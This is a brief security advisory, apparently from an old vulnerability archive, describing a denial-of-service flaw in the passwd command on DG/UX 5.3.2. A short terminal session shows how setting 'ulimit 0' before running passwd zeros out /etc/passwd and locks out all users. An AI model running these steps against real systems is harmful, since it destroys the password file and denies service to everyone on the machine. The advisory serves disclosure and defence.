COMMAND

    passwd

SYSTEMS AFFECTED

    DG/UX 5.3.2

PROBLEM

    This denial of service attack zeros out the  /etc/passwd file.  It
    works like so:

    /~target> ls -la /etc/passwd

         -rw-rw-r--     root     root     24 Feb 1995    /etc/passwd

    /~target> ulimit 0
    /~target> passwd

         Enter old password:
         Enter new password:

    /~target> ls -la /etc/passwd

         -rw-rw-r--     root     root     11 June 01:34  /etc/passwd

    Calling ulimit 0  and then calling  /etc/passwd will then  set the
    passwd file to all zeros.

    Service is denied  to everyone until  the machine is  booted up in
    single user mode and a copy of the passwd file is restored.